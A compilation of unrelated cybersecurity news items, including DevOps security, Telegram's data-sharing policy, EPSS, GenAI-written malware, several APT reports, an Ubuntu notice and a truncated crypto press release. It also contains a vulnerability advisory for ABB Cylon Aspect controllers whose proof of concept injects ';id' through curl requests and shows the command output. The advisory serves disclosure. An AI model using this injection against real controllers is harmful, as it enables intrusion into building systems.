Developers need to do more than scan code and vet software components, and ops should do more than just defend the deployment pipeline.

Source: whiteMocca via Shutterstock

Combining software development, deployment, and operations pipelines into DevOps teams promises increased efficiency, easier and more frequent updates, and higher-quality applications. Yet the complexity of the infrastructure has also led to a growing attack surface that is hard to monitor and maintain.

On the development side, the average organization uses four to nine different programming languages, deals with millions of new packages and images every year, and has to remediate thousands of vulnerabilities in the most common open source components, according to JFrog's "Software Supply Chain State of the Union 2024" report. At the other end of the DevOps pipeline, two-thirds of companies have delayed deployment of an application due to Kubernetes security concerns, and nearly half (46%) had actual security incidents, according to Red Hat's 2024 "The State of Kubernetes" security report.

Cybersecurity professionals aiming to secure the application pipeline have to pay attention to the software being written by developers, the open source components imported by developers, the containers and cloud infrastructure used to deploy software, and the build tools used to make the software, says Jeff Williams, chief technology officer and co-founder of Contrast Security, a software security firm.

"The problem is it's such a huge attack surface," he says. "It's not just your pipeline. It's all the other code that goes into developing software — it's IDEs and test tools and performance suites. ... Any one of them is capable of subverting the code that your developers are building and producing."

Gaining an integrated view of the entire DevOps pipeline, from development to application deployment, is increasingly important. Software components — not just open source libraries but Docker containers and other infrastructure assets — often have vulnerable code, increasing risk. Third-party tools can be compromised — remember Codecov's breach — allowing malicious code to be injected into projects under development. Cloud infrastructure and storage can be misconfigured or improperly protected, a la Snowflake instances.

Having good visibility into the state of the DevOps software pipeline and deployment infrastructure is critical, says Josh Lemos, chief information security officer at DevOps provider GitLab (and no relation to the author).

"There are two really important trains that need to run," he says. "One is you need the development and packaging security, compliance, and attestation of all of your build artifacts in one of those trains or work streams. The other is the deployment monitoring and orchestration of those things in your production environments."

**Write, Use, Buy, Build**

Overall, DevOps security teams need to protect four areas that are open to attack. The first and second areas are most obvious to developers: the code that they write and the software components that they use, says Contrast Security's Williams.

"We've been talking about \[that code\] since the beginning of OWASP," he says. "If you have bugs in the code you write, people exploit them, and you get breached. It's not good."

Companies also have to pay attention to the code that they buy or, through a service, use indirectly. Finally, they need to secure the applications and services that are used to build and deploy software —the IDEs, test tools, performance suites, and instrumentation.

"Any one of those is capable of subverting the final code," Williams says, adding that most DevOps teams do not pay attention to the full attack surface posed by their pipelines and software supply chains. "I think we're still in the Stone Age when it comes to real supply chain security."

While the vast majority of companies (87%) are building or moving applications to cloud-native, 59% did not understand the security implications of doing so and have suffered a security issue as a result. Predictably, the collection of common security incidents are as varied as the infrastructure needed to produce and deploy software: Network breaches, API vulnerabilities, certificate misconfigurations, cluster misconfigurations, and vulnerabilities in containers are among the top causes of security incidents, according to a November 2023 survey of cloud-native application security issues.

Even companies that are monitoring parts of their DevOps pipelines are not getting good coverage, says Williams.

"It's not everywhere, and almost nothing covers part of the DevOps like developer workstations and IDEs and testing frameworks and plug-ins," he says. "I mean, there's a universe of code that nobody's monitoring, and most organizations are not really thinking about this problem."

**Questioning Your DevOps Infrastructure**

For most companies, ensuring that they have visibility into the entire pipeline is essential. Monitoring can warn when a retired package is suddenly revived in the repository by an untrusted party, or when secrets are included in code that might otherwise be pushed to a repository, or when a Docker image has significant amounts of unused software.

Companies need to have continuous monitoring of each step in the pipeline, says Paul Davis, field CISO at software supply chain provider JFrog.

"\[Knowing\] what's going ... and \[seeing that\] a package has gone bad in production, or that I need to roll back a package because somebody's come with a new vulnerability, that ease of use \[and visibility\] into the attack surface — that insight and that traceability — is key for me," he says.

Companies should also take action around four specific areas of their DevOps infrastructure, according to GitLab's Lemos. First, the identities of any developer, ops specialist, device, or service that takes part in the pipeline should be logged. Companies should also maintain a list of software artifacts that they are using, which ones have vulnerabilities, and maintain a private repository, if possible. The build systems should be frequently tested and any automated triggers — such as changes to third-party software that triggers a build — should be analyzed for potential security implications. Finally, the entire pipeline should be architected to minimize the impact — that is, the "blast radius" — of a compromise, he says.

"The best thing I've seen companies do as a first step is to get to some known good design patterns," Lemos says. "The more of that that you can abstract away from \[bad security practices\], the more successful your security program will be, the less churn and load you'll have, and the more reusable your code becomes."

**The Promise and Peril of AI**

The breadth of the DevOps attack surface also represents an opportunity for automation and the assistance of artificial intelligence (AI). DevOps already gains much of its agility and speed through automation, with configuration- and infrastructure-as-code dominating because expressing architecture as files allows repeatability for operations, while analyzing the instructions allows for more secure infrastructure.

Yet when it comes to security, most companies are holding back on adoption, says Laurent Gil, chief product officer for Kubernetes automation platform CAST AI.

"Almost every security company offers automation in some form, and yet nobody is using it," he says. "\[Security teams\] should know that it's OK to use automation to either block things that should be blocked or to auto-remediate when you find something that contains vulnerabilities."

Yet AI development also brings new ways of working with code and data — an attack surface area that is not fully understood and for which DevOps teams are not ready, Lemos says.

"There is the possibility to do really old-style attacks because you're combining data and content into a model," he says. "A model with a pickle file that gets consumed into a data scientist's workstation, if they deserialize it and it has a payload, they've just invited some malicious code into their environment."

**About the Author**

Veteran technology journalist of more than 20 years. Former research engineer. Written for more than two dozen publications, including CNET News.com, Dark Reading, MIT's Technology Review, Popular Science, and Wired News. Five awards for journalism, including Best Deadline Journalism (Online) in 2003 for coverage of the Blaster worm. Crunches numbers on various trends using Python and R. Recent reports include analyses of the shortage in cybersecurity workers and annual vulnerability trends.

Moving DevOps Security Out of the 'Stone Age'

Telegram is making changes to make it less attractive for users with criminal intentions, by saying it will share user IPs and phone numbers with authorities.

Last month we reported how Telegram CEO Pavel Durov was indicted on charges of complicity in the distribution of child sex abuse images, aiding organized crime, drug trafficking, fraud, and refusing lawful orders to give information to law enforcement.

Now, in a potentially related development, chat app Telegram has changed its privacy policy to reflect that it will share user’s IP addresses and telephone numbers if they are suspected of committing a crime.

> “8.3. Law Enforcement Authorities
> 
> If Telegram receives a valid order from the relevant judicial authorities that confirms you’re a suspect in a case involving criminal activities that violate the Telegram Terms of Service, we will perform a legal analysis of the request and may disclose your IP address and phone number to the relevant authorities. If any data is shared, we will include such occurrences in a quarterly transparency report published at: https://t.me/transparency.”

Durov said the changes were made to discourage the criminal abuse of Telegram Search, a feature that is known to be used for buying and selling illegal goods. A dedicated team of moderators will use Artificial Intelligence to make the search safer. These moderators will also go over reports submitted by users through the @SearchReport bot about search terms that can be used to find illegal content.

All these measures together should discourage criminals. Telegram was set up to find friends and news, not to trade illegal goods, Durov emphasized:

> “We won’t let bad actors jeopardize the integrity of our platform for almost a billion users.”

It should be clear that this is all a work in progress. The bot for the transparency reports is not yet ready for action, for example.

Telgram transparency report is not ready yet

> “This bot can give you a Telegram transparency report as per section 8.3 of the Telegram Privacy Policy.
> 
> We are updating this bot with current data. Please come back within the next few days.”

All in all, the future will show how adequate the moderators can act on reports and how easy, or difficult, it will be for law enforcement to submit a “valid order.”

But criminals are probably already looking for alternatives as we speak.

**We don’t just report on privacy—we offer you the option to use it.**

Privacy risks should never spread beyond a headline. Keep your online privacy yours by using Malwarebytes Privacy VPN.

 Telegram will hand over user details to law enforcement 

Many businesses rely on the Common Vulnerability Scoring System (CVSS) to assess the severity of vulnerabilities for prioritization. While these scores provide some insight into the potential impact of a vulnerability, they don’t factor in real-world threat data, such as the likelihood of exploitation. With new vulnerabilities discovered daily, teams don’t have the time - or the budget - to

Many businesses rely on the Common Vulnerability Scoring System (CVSS) to assess the severity of vulnerabilities for prioritization. While these scores provide some insight into the potential impact of a vulnerability, they don't factor in real-world threat data, such as the likelihood of exploitation. With new vulnerabilities discovered daily, teams don't have the time - or the budget - to waste on fixing vulnerabilities that won't actually reduce risk.

Read on to learn more about how CVSS and EPSS compare and why using EPSS is a game changer for your vulnerability prioritization process.

**What is vulnerability prioritization?**

Vulnerability prioritization is the process of evaluating and ranking vulnerabilities based on the potential impact they could have on an organization. The goal is to help security teams determine which vulnerabilities should be addressed, in what timeframe, or if they need to be fixed at all. This process ensures that the most critical risks are mitigated before they can be exploited and is an essential part of attack surface management.

In an ideal world, security teams would be able to remediate every vulnerability as soon as it is discovered, but that's neither possible nor efficient. Research has shown that most teams can only remediate about 10-15% of their open vulnerabilities per month, which is why prioritizing effectively is so important.

Ultimately, getting vulnerability prioritization right ensures organizations can make the best use of their resources. Why does this matter? Because businesses can't afford to spend money on things unless it makes a difference, and risk management is all about making sure money is spent on genuinely reducing risk.

**The limitations of CVSS for vulnerability prioritization**

Historically, one of the most common ways organizations prioritize vulnerabilities is by using CVSS base scores.

CVSS base scores are determined by factors that are constant across time and user environments, such as the ease and technical means by which a vulnerability can be exploited and the consequence of a successful exploit. These factors are quantified and combined to generate a final score between 0 and 10 – the higher the score, the higher the severity.

CVSS scores offer a baseline and a standardized way of assessing severity and are sometimes necessary for compliance. However, they have limitations that make relying on them less efficient than considering them alongside real-time data sources.

One of the main limitations of CVSS scores is that they do not consider the current threat landscape, such as whether a vulnerability is being actively exploited in the wild. This means that a vulnerability with a high CVSS score may not necessarily be the most critical issue an organization faces. Take CVE-2023-48795, for example. Its current CVSS score is 5.9, which is 'medium'. But if you consider other threat intelligence sources, such as EPSS, you'll see there's a high chance of it being exploited within the next 30 days (at the time of writing).

This shows the importance of taking a more holistic approach to vulnerability prioritization that considers not only CVSS scores but also real-time threat intelligence.

**Improving prioritization with exploit data**

To improve vulnerability prioritization, organizations should move beyond CVSS scores and consider other factors, such as exploitation activity identified in the wild. A valuable source for this is EPSS, a model developed by FIRST.

**What is EPSS?**

EPSS is a model that provides a daily estimate of the probability that a vulnerability will be exploited in the wild within the next 30 days. The model produces a score between 0 and 1 (0 and 100%), with higher scores indicating a higher probability of exploitation.

The model works by collecting a wide range of vulnerability information from various sources, such as the National Vulnerability Database (NVD), CISA KEV, and Exploit-DB, along with evidence of exploitation activity. Using machine learning, it trains its model to identify subtle patterns between these data points, allowing it to predict the likelihood of future exploitation.

**CVSS vs EPSS**

So how exactly do EPSS scores help improve vulnerability prioritization?

The diagram below illustrates a scenario in which vulnerabilities with a CVSS score of 7 or higher are prioritized for remediation. The blue circle represents all of these CVEs recorded on 1 October, 2023. In red, you can see all the CVEs with CVSS scores that were exploited in the following 30 days.

As you can see, the number of vulnerabilities that were exploited in the wild represents a small number of the vulnerabilities with a CVSS score of 7 or higher.

Original source: FIRST.org

Let's compare this to a scenario where vulnerabilities are prioritized based on an EPSS threshold set to 10%.

A noticeable difference between the two diagrams below is the size of the blue circles, which indicate the number of vulnerabilities that need to be prioritized. This gives an idea of the amount of effort required for each prioritization strategy. With a 10% EPSS threshold, the effort is significantly lower, as there are far fewer vulnerabilities to prioritize, reducing the time and resources needed. Efficiency is also significantly higher, as organizations can focus on vulnerabilities that would have the most impact if not addressed first.

Original source: FIRST.org

By considering EPSS when prioritizing vulnerabilities, organizations can better align their remediation efforts with the actual threat landscape. For example, if EPSS indicates a high probability of exploitation for a vulnerability with a relatively low CVSS score, security teams might consider prioritizing that vulnerability over others that may have higher CVSS scores but a lower likelihood of exploitability.

**Simplify vulnerability prioritization with Intruder**

Intruder is a cloud-based security platform that helps businesses manage their attack surface and identify vulnerabilities before they can be exploited. By offering continuous security monitoring, attack surface management, and intelligent threat prioritization, Intruder allows teams to focus on the most critical risks while simplifying cybersecurity.

A screenshot of the Intruder platform

Intruder is about to release a vulnerability prioritization feature, powered by the Exploit Prediction Scoring System (EPSS) – a model that leverages machine learning to predict how likely a vulnerability is to be exploited in the next 30 days.

You'll soon be able to view EPSS scores right inside the Intruder platform, giving your team real-world context for smarter prioritization. These scores will be displayed alongside the existing scoring system, which combines CVSS scores with input from Intruder's team of security experts to intelligently prioritize your results.

_Sign up now to get ahead of the new release. Start your 14-day free trial or book some time to chat and learn more._

Found this article interesting? This article is a contributed piece from one of our valued partners. Follow us on Twitter __ and LinkedIn to read more exclusive content we post.

EPSS vs. CVSS: What’s the Best Approach to Vulnerability Prioritization?

Researchers have uncovered one of the first examples of threat actors using artificial intelligence chatbots for malware creation, in a phishing attack spreading the open source remote access Trojan.

Source: Irene R via Shutterstock

Threat actors have used generative artificial intelligence (GenAI) to write malicious code in the wild to spread an open source remote access Trojan (RAT). It's one of the first observed examples of attackers weaponizing the chatbot technology for this purpose.

Researchers from HP Wolf Security have found evidence of the campaign, in which the attackers used GenAI to help them write VBScript and JavaScript code that was then used to distribute the AsyncRAT, an easily accessible, commercial malware that can be used for controlling a victim's computer.

The researchers first noticed the behavior when investigating a suspicious email in June. It had "an unusual French email attachment" posing as an invoice, HP Wolf Security revealed in its "Threat Insights Report" (PDF) for this month. The researchers ultimately discovered a campaign that was using both scripting types — code that was not, as it usually is, obfuscated — to spread AsyncRAT.

"The scripts' structure, comments, and choice of function names and variables were strong clues that the threat actor used GenAI to create the malware," according to the report.

It's widely believed that attackers already have used GenAI to help them write more convincing phishing emails, but so far there has been little evidence of the use of the technology to write malicious code, largely because legitimate chatbot tools have guardrails that prevent malicious use. However, security experts have known since the advent of the technology that it was only a matter of time before threat actors would find a way around those gates, and malicious chatbot development is a phenomenon on the Dark Web.

Related:Dark Reading Confidential: The CISO and the SEC

The campaign demonstrates that attackers are quickly leveling up in their use of GenAI in a way that should put defenders on alert, the researchers noted. "The activity shows how GenAI is accelerating attacks and lowering the bar for cybercriminals to infect endpoints or malicious files before they even reach someone's inbox," according to the report.

**Investigating a Malicious Email Campaign**

Once the researchers discovered the disguised invoice, they dug deeper to find that the attachment was simply an HTML file which, when opened in the browser, asks for a password. At first they believed the threat to be an HTML-smuggling attack; however, it didn't behave the way other threats do in that the payload stored inside the HTML file was not encrypted inside an archive.

Instead, the file was encrypted within the JavaScript code itself, using the Advanced Encryption Standard (AES) and implementing it without making any mistakes. This meant that for researchers to decrypt the file, they needed the correct password.

Related:How Should CISOs Navigate the SEC Cybersecurity and Disclosure Rules?

Eventually, the research team brute-forced the correct password to the file and found that the decrypted archive contained a VBScript file that, when run, starts an infection chain that ultimately deploys the AsyncRAT. "The VBScript writes various variables to the Windows Registry, which are reused later in the chain," according to the report.

Part of that infection chain is the drop of a JavaScript file into the user directory that then reads a PowerShell script from the registry and injects it into a newly started PowerShell process. The PowerShell script then makes use of the other registry variables, and runs two more executables, which start the malware payload after injecting it into a legitimate process.

**Unpacking GenAI-Generated Scripts**

It was through a deeper analysis of both the VBScript and the JavaScript used in the infection chain that the researchers noticed that the code was not obfuscated, which seemed odd because code obfuscation is something attackers typically use to cover their tracks.

"In fact, the attacker had left comments throughout the code, describing what each line does — even for simple functions," according to the report. "Genuine code comments in malware are rare because attackers want to their make malware as difficult to understand as possible."

Related:Cybersecurity Success Hinges on Full Organizational Support, New CompTIA Report Asserts

This behavior and the scripts' structure, consistent comments for each function, and the choice of function names and variables, made it reasonably clear that the attacker used GenAI to develop the scripts, according to HP Wolf Security.

Now that threat actors are starting to harness GenAI in their attack strategies, defenders also should integrate the technology into their security posture to fight fire with fire. Organizations can use GenAI to recognize patterns of threats to identify unauthorized access or malicious intent before attackers have a chance to infiltrate an environment. Indeed, the same efficiencies that GenAI create in an attack flow for malicious actors also can be leveraged by defenders to make their jobs easier, the security researchers said.

**About the Author**

Elizabeth Montalbano is a freelance writer, journalist, and therapeutic writing mentor with more than 25 years of professional experience. Her areas of expertise include technology, business, and culture. Elizabeth previously lived and worked as a full-time journalist in Phoenix, San Francisco, and New York City; she currently resides in a village on the southwest coast of Portugal. In her free time, she enjoys surfing, hiking with her dogs, traveling, playing music, yoga, and cooking.

GenAI Writes Malicious Code to Spread AsyncRAT

Who needs advanced malware when you can take advantage of a bunch of OSS tools and free cloud services to compromise your target?

Source: National Picture Library via Alamy Stock Photo

A threat actor is leveraging Cloudflare Worker cloud services and other tools to perform espionage against government and law enforcement targets in and around the Indian subcontinent.

"SloppyLemming" is an advanced persistent threat (APT) that Crowdstrike (tracking it as Outrider Tiger) has previously linked to India. That attribution rings consistent with the group's latest effort to steal valuable intelligence from a wide range of sensitive organizations in countries hugging India's borders.

Among its victims: government agencies — legislative bodies, foreign affairs, defense — IT and telecommunications providers, construction companies, and Pakistan's sole nuclear power facility. Pakistani police departments and other law enforcement came under particular fire, but SloppyLemming's attacks also spread to the Bangladeshi and Sri Lankan militaries and governments, as well as organizations in China's energy and academic sectors, and there have been hints of potential targeting in or around Australia's capital, Canberra.

The campaign, described in a new blog post from Cloudflare, employs Discord, Dropbox, GitHub, and most notably Cloudflare's own "Workers" platform together in phishing attack chains that end in credential harvesting and email compromise.

**Hackers Using Cloudflare Workers**

SloppyLemming attacks generally begin with a spear-phishing email — say, a fake maintenance alert from a police station's IT department. It distinguishes itself more in step two when it abuses Cloudflare's Workers service.

Cloudflare Workers are a serverless computing platform for running scripts that operate on Web traffic flowing through Cloudflare's global servers. They're essentially chunks of JavaScript that intercept requests made to a user's website in transit — before they reach the user's origin server and apply some sort of function to them, for example, redirecting links or adding security headers.

Like other flexible, multifunctional legitimate services, Cloudflare Workers can also be abused for malicious ends. In 2020, Korean hackers used Workers to perform SEO spam, and a backdoor called "BlackWater" used it to interface with its command-and-control (C2) server; the following year, attackers used it to facilitate a cryptocurrency scam.

SloppyLemming uses a custom-built tool called "CloudPhish" to handle credential logging logic and exfiltration. CloudPhish users first define their targets, and their intended channel for exfiltration. Then the program scrapes the HTML content associated with the target's webmail login page, and creates a malicious copycat with it. When the target enters their login information, it's stolen via a Discord webhook.

**Abusing Cloud Services**

SloppyLemming has other tricks up its sleeve, too. In limited cases, it used a malicious Worker to collect Google OAuth tokens.

Another Worker was used to redirect to a Dropbox URL, where lay a RAR file designed to exploit CVE-2023-38831, a "high" severity, 7.8 out of 10 CVSS-rated issue in WinRAR versions prior to 6.23. The same vulnerability was recently used by a Russian threat group against Ukrainian citizens. At the end of this Dropbox-heavy exploit chain was a remote access tool (RAT) that engaged several more Workers.

"They use at least three, or four, or five different cloud tools," notes Blake Darché, head of Cloudforce One at Cloudflare. "Threat actors generally are trying to take advantage of companies by using different services from different companies, so \[victims\] can't coordinate what they're doing."

To make sense of attack chains that spread across so many platforms, he says, "You've got to have good control of your network, and implement zero-trust architectures so you understand what's going in and out of your network, through all the different peripheries: DNS traffic, email traffic, Web traffic, understanding it in totality. I think a lot of organizations really struggle in this area."

**About the Author**

Nate Nelson is a freelance writer based in New York City. Formerly a reporter at Threatpost, he contributes to a number of cybersecurity blogs and podcasts. He writes "Malicious Life" -- an award-winning Top 20 tech podcast on Apple and Spotify -- and hosts every other episode, featuring interviews with leading voices in security. He also co-hosts "The Industrial Security Podcast," the most popular show in its field.

'SloppyLemming' APT Abuses Cloudflare Service in Pakistan Attacks

The state-sponsored advanced persistent threat (APT) is going after high-value communications service provider networks in the US, potentially with a dual set of goals.

Source: BSIP SA via Alamy Stock Photo

A freshly discovered advanced persistent threat (APT) dubbed "Salt Typhoon" has reportedly infiltrated Internet service provider (ISP) networks in the US, looking to steal information and potentially set up a launchpad for disruptive attacks.

Citing "people familiar with the matter," the Wall Street Journal broke the news on Sept. 25 that the Chinese-sponsored state hackers have successfully targeted "a handful" of cable and broadband service providers during the campaign.

Other details are scant, but Salt Typhoon's efforts highlight China's priorities when it comes to geopolitical realities, researchers note.

**A Sprinkle of Espionage, A Dash of Pre-Positioning**

For instance, a position within the service provider network would offer valuable reconnaissance for how to further target high-value marks working for the federal government, law enforcement, manufacturers, military contractors, and Fortune 100 companies. 

"Obtaining access to ISPs would make it easier to survey those users of the ISPs for information on their location and what kinds of services are being accessed," says Sean McNee, vice president of research and data at DomainTools. "Bad actors could get information about the ISP's users, where they live and billing information, and what kind of access or usage they have, \[who they call, and\] text messages."

But the concern doesn't stop there. Given China's desire to control Taiwan and other assets in the region, there's very likely a military component to the campaign as well.

"Based on the recent history of Chinese-sponsored cyber campaigns and warnings from \[the Cybersecurity and Infrastructure Security Agency\] and FBI, China has escalated from surveillance-only goals toward installing an offensive capability to disrupt critical US civilian and military infrastructure," warns Sean Deuby, principal technologist at Semperis. "This could potentially range from 'blinking the lights' to dissuade US intervention to actively delaying or crippling a US response to Chinese activities."

There's precedent for that assessment. Microsoft outed Volt Typhoon in January and its alarming efforts to plant itself inside military bases, critical infrastructure assets, and telecom infrastructure — all with the goal of being able to cause outages, disrupt communications, and sow panic in the event of a kinetic conflict with the US in the South China Sea. Since then, China has denied the allegations, while the APT has been actively expanding its efforts despite its cover being blown.

**China's Recipe: Targeting Telecom, ISPs, Critical Infrastructure**

The development is the latest in a string of Chinese-sponsored efforts to subvert critical infrastructure in the US and destabilize Pacific Rim allies, many flagged by Microsoft using hurricane-related names.

For instance, a Chinese threat actor known as Flax Typhoon emerged a year ago, using legitimate tools and utilities built into the Windows operating system to carry out an extremely stealthy and persistent spy operation against entities in Taiwan. Last week, news emerged that the APT had built a 200,000-device Internet of Things (IoT) botnet in order to gain a foothold in government, military, and critical manufacturing targets in the US.

There's also the APT that Microsoft calls Brass Typhoon (aka APT41, Earth Baxia, and Wicked Panda) that recently attacked Taiwanese government agencies, Filipino and Japanese military, and energy companies in Vietnam, installing backdoors for cyberespionage purposes.  

On top of that, other China-linked groups have made a name for themselves in specifically targeting communications service providers, such as Mustang Panda, especially in Taiwan and other countries of interest.

"Chinese-backed threat actors have been conducting attacks against telcos for as long as I can remember," Semperis' Deuby says. "Historically, their goals are to create 'persistence' in the carrier. By that I mean they will infiltrate a target, gain a foothold, and then move laterally with the goal of maintaining persistence and extracting data from strategic targets as needed."

He adds that lurking and listening is a specialty: "While Chinese government actors were behind the infamous Operation Soft Cell campaign in 2019, where the threat actor stole call data records, they had infiltrated some of the telcos more than five years before being discovered."

**Communications Service Provider Defenses Need Seasoning**

The ongoing targeting of communications infrastructure should put carriers and service providers on notice to harden their defenses.

Aside from phishing and social engineering of employees, Terry Dunlap, chief security strategist at NetRise, notes that firmware and supply chain attacks using core network gear could both be attack avenues against ISPs.

"ISPs' blind spots are the firmware running their devices. Most firmware contains insecure or sloppy code that can be easily exploited, if discovered," he notes. "Another attack vector would be the supply chain. For example, if the Ethernet controller in a router or switch is supplied by a Chinese company, there are scenarios where malicious code or backdoors could be integrated into that Ethernet controller, providing an adversary easy access to that important piece of networking equipment."

In 2020, the World Economic Forum and its global partners developed a set of best practices for ISPs (PDF), including principles such as sharing threat intelligence between peers, working more closely with hardware manufacturers to increase minimum levels of security, and improving routing security, Deuby says.

Still, "as someone that's talked to many organizations about the well-understood security steps they should be taking versus their actual security posture, I'm sure plenty of gaps remain."

**About the Author**

Tara Seals has 20+ years of experience as a journalist, analyst and editor in the cybersecurity, communications and technology space. Prior to Dark Reading, Tara was Editor in Chief at Threatpost, and prior to that, the North American news lead for Infosecurity Magazine. She also spent 13 years working for Informa (formerly Virgo Publishing), as executive editor and editor-in-chief at publications focused on both the service provider and the enterprise arenas. A Texas native, she holds a B.A. from Columbia University, lives in Western Massachusetts with her family and is on a never-ending quest for good Mexican food in the Northeast.

China's 'Salt Typhoon' Cooks Up Cyberattacks on US ISPs

The ABB Cylon Aspect version 3.07.00 BMS/BAS controller suffers from an unauthenticated OS command injection vulnerability. This can be exploited to inject and execute arbitrary shell commands through the host HTTP GET parameter called by networkDiagAjax.php script.

  
ABB Cylon Aspect 3.07.00 (networkDiagAjax.php) Remote Code Execution

Vendor: ABB Ltd.  
Product web page: https://www.global.abb  
Affected version: NEXUS Series, MATRIX-2 Series, ASPECT-Enterprise, ASPECT-Studio  
                  Firmware: <=3.07.00

Summary: ASPECT is an award-winning scalable building energy management  
and control solution designed to allow users seamless access to their  
building data through standard building protocols including smart devices.

Desc: The ABB BMS/BAS controller suffers from an unauthenticated OS command  
injection vulnerability. This can be exploited to inject and execute arbitrary  
shell commands through the 'host' HTTP GET parameter called by networkDiagAjax.php  
script.

Tested on: GNU/Linux 3.15.10 (armv7l)  
           GNU/Linux 3.10.0 (x86_64)  
           GNU/Linux 2.6.32 (x86_64)  
           Intel(R) Atom(TM) Processor E3930 @ 1.30GHz  
           Intel(R) Xeon(R) Silver 4208 CPU @ 2.10GHz  
           PHP/7.3.11  
           PHP/5.6.30  
           PHP/5.4.16  
           PHP/4.4.8  
           PHP/5.3.3  
           AspectFT Automation Application Server  
           lighttpd/1.4.32  
           lighttpd/1.4.18  
           Apache/2.2.15 (CentOS)  
           OpenJDK Runtime Environment (rhel-2.6.22.1.-x86_64)  
           OpenJDK 64-Bit Server VM (build 24.261-b02, mixed mode)

Vulnerability discovered by Gjoko 'LiquidWorm' Krstic (2024) and Prism Infosec (2022)  
                            @zeroscience

Advisory ID: ZSL-2024-5829  
Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2024-5829.php  
CVE ID: CVE-2023-0636  
CVE URL: https://cve.mitre.org/cgi-bin/cvename.cgi?name=2023-0636

21.04.2024

--

$ cat project

                 P   R   O   J   E   C   T

                        .|  
                        | |  
                        |'|            ._____  
                ___    |  |            |.   |' .---"|  
        _    .-'   '-. |  |     .--'|  ||   | _|    |  
     .-'|  _.|  |    ||   '-__  |   |  |    ||      |  
     |' | |.    |    ||       | |   |  |    ||      |  
 ____|  '-'     '    ""       '-'   '-.'    '`      |____  
░▒▓███████▓▒░░▒▓███████▓▒░ ░▒▓██████▓▒░░▒▓█▓▒░▒▓███████▓▒░    
░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░   
░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░   
░▒▓███████▓▒░░▒▓███████▓▒░░▒▓████████▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░   
░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░   
░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░   
░▒▓███████▓▒░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░                                                              
         ░▒▓████████▓▒░▒▓██████▓▒░ ░▒▓██████▓▒░   
         ░▒▓█▓▒░░░░░░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░  
         ░▒▓█▓▒░░░░░░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░░░░░░   
         ░▒▓██████▓▒░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒▒▓███▓▒░  
         ░▒▓█▓▒░░░░░░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░  
         ░▒▓█▓▒░░░░░░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░  
         ░▒▓█▓▒░░░░░░░░▒▓██████▓▒░ ░▒▓██████▓▒░                                               

                                                                                                               $ curl http://192.168.73.31/networkDiagAjax.php?command=traceroute&host=;id  
$ curl http://192.168.73.31/networkDiagAjax.php?command=nslookup&host=;id  
$ curl http://192.168.73.31/networkDiagAjax.php?command=ping&host=;id  
uid=33(www-data) gid=33(www-data) groups=33(www-data)

ABB Cylon Aspect 3.07.00 Remote Code Execution

Ubuntu Security Notice 7033-1 - It was discovered that some Intel Processors did not properly restrict access to the Running Average Power Limit interface. This may allow a local privileged attacker to obtain sensitive information. It was discovered that some Intel Processors did not properly implement finite state machines in hardware logic. This may allow a local privileged attacker to cause a denial of service.

==========================================================================  
Ubuntu Security Notice USN-7033-1  
September 25, 2024

intel-microcode vulnerabilities  
==========================================================================

A security issue affects these releases of Ubuntu and its derivatives:

- Ubuntu 24.04 LTS  
- Ubuntu 22.04 LTS  
- Ubuntu 20.04 LTS  
- Ubuntu 18.04 LTS  
- Ubuntu 16.04 LTS

Summary:

Several security issues were fixed in Intel Microcode.

Software Description:  
- intel-microcode: Processor microcode for Intel CPUs

Details:

It was discovered that some Intel(R) Processors did not properly restrict  
access to the Running Average Power Limit (RAPL) interface. This may allow  
a local privileged attacker to obtain sensitive information.  
(CVE-2024-23984)

It was discovered that some Intel(R) Processors did not properly implement  
finite state machines (FSMs) in hardware logic. This may allow a local  
privileged attacker to cause a denial of service (system crash).  
(CVE-2024-24968)

Update instructions:

The problem can be corrected by updating your system to the following  
package versions:

Ubuntu 24.04 LTS  
  intel-microcode                 3.20240910.0ubuntu0.24.04.1

Ubuntu 22.04 LTS  
  intel-microcode                 3.20240910.0ubuntu0.22.04.1

Ubuntu 20.04 LTS  
  intel-microcode                 3.20240910.0ubuntu0.20.04.1

Ubuntu 18.04 LTS  
  intel-microcode                 3.20240910.0ubuntu0.18.04.1+esm1  
                                  Available with Ubuntu Pro

Ubuntu 16.04 LTS  
  intel-microcode                 3.20240910.0ubuntu0.16.04.1+esm1  
                                  Available with Ubuntu Pro

After a standard system update you need to reboot your computer to make  
all the necessary changes.

References:  
  https://ubuntu.com/security/notices/USN-7033-1  
  CVE-2024-23984, CVE-2024-24968

Package Information:  
  https://launchpad.net/ubuntu/+source/intel-microcode/3.20240910.0ubuntu0.24.04.1  
  https://launchpad.net/ubuntu/+source/intel-microcode/3.20240910.0ubuntu0.22.04.1  
  https://launchpad.net/ubuntu/+source/intel-microcode/3.20240910.0ubuntu0.20.04.1

Ubuntu Security Notice USN-7033-1

UEEx enhances user security with new compensation policies addressing abnormal market volatility and asset protection. Users can now…

UEEx enhances user security with new compensation policies addressing abnormal market volatility and asset protection. Users can now recover losses from flash crashes and unauthorized account breaches.

UEEx, a global digital asset trading platform, has announced a series of measures to reinforce both security and transparency for its users. These initiatives include a compensation policy for abnormal market volatility and asset protection protocols designed to address security concerns and ensure that users’ assets remain safe.

****Tackling Extreme Market Volatility with Compensation Mechanisms****

